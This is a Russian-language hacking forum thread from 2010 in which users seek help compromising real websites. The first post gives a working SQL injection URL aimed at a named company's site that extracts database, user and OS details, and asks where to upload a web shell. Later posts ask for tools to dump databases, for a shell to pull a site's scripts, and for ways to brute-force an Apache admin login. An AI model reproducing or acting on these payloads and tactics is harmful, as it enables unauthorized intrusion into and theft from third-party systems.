05.05.2010, 23:16
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами:
8638130
Репутация:
54
|
|
http://www.human-solutions.com/company/news_press_report_en.php?id=-195+union+select+1,2,3,4,concat_ws(0x3a,version(), database(),user(),@@version_compile_os),6,7,8,9+--+ file_priv:Y Не могу найти админку, phpmyadmin или ftp. Не могу прочитать файлы чтобы найти путь куда залить shell. Что можете посоветовать?
можно с BENCHMARK поколдовать чтоб вывело полный путь
|
|
|
06.05.2010, 06:34
|
|
Познающий
Регистрация: 29.08.2009
Сообщений: 75
С нами:
8789993
Репутация:
5
|
|
Здравствуйте всем!
Sql-inj начал заниматься недавно, всё очень хорошо получается, но возник вопрос есть ли софт, который может помочь сдампипть базу через inj?
|
|
|
|
06.05.2010, 09:36
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
С нами:
9610572
Репутация:
32
|
|
Тебе под MySql или MSSql?
|
|
|
|
06.05.2010, 09:58
|
|
Познающий
Регистрация: 29.08.2009
Сообщений: 75
С нами:
8789993
Репутация:
5
|
|
Сообщение от mr.celt
Тебе под MySql или MSSql?
Расскажи про ту и ту базу если не сложно.
|
|
|
|
06.05.2010, 11:25
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами:
10441826
Репутация:
1861
|
|
но сервер не выполняет как php, а отдаёт файл на закачку.
скорей всего, причиной является хтацесс с php_flag engine off
|
|
|
|
06.05.2010, 11:43
|
|
Banned
Регистрация: 05.02.2010
Сообщений: 70
С нами:
8559689
Репутация:
5
|
|
Сообщение от Iceangel_
скорей всего, причиной является хтацесс с php_flag engine off
спс, может быть. ша поишу инклудов в двиге, токо трабла в том как слить сайт полность (скрипты)
подскажите плиз шелл или скрипт чтобы слить скрипты с сайта, wso2.4 не пакует в архив ((
|
|
|
|
06.05.2010, 12:31
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от scorpic393
спс, может быть. ша поишу инклудов в двиге, токо трабла в том как слить сайт полность (скрипты)
подскажите плиз шелл или скрипт чтобы слить скрипты с сайта, wso2.4 не пакует в архив ((
pclzip.lib.php
|
|
|
|
06.05.2010, 11:44
|
|
Новичок
Регистрация: 16.01.2009
Сообщений: 17
С нами:
9114129
Репутация:
2
|
|
Нужно поломать сайт с аунтификацией такого вида а-ля alert (JS). На вид подумал что сама аунтификация довольно старая, и возможно есть уязвимости.
Пикча формы, на фоне - страница, открывающаяся после неуспешного входа (адреса счел нужным скрыть)
http://s58.radikal.ru/i160/1005/34/9cb26e6c3bc2.png
Такая штука отображается при доступе к фаилу http://site/admin.php. На пхп фаил не похоже, судя по форме неудачи, прописано где то в апаче.
brutus-aet2 ом прогонять пробовал, выдает бред при разных настройках. По словарю он выдает каждый раз новые пароли, по подбору - тоже.
Спасибо.
ЗЫ: Поиск юзал. Просьба постить только по теме.
ЗЗЫ: Если запостил тему не в том разделе, просьба переместить и отправить ссылку в ЛС.
ЗЗЗЫ: Ломаю не ради интереса и не ради того, чтобы "нагадить".
|
|
|
|
06.05.2010, 11:46
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
Пишу в .htaccess
, и все равно выполняеться код пхп! Как решить? |
|
|
|
06.05.2010, 12:04
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
С нами:
10021597
Репутация:
905
|
|
Сообщение от Strilo4ka
Пишу в .htaccess
, и все равно выполняеться код пхп! Как решить?
А в комбинации с RemoveType?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Комбинированный вид
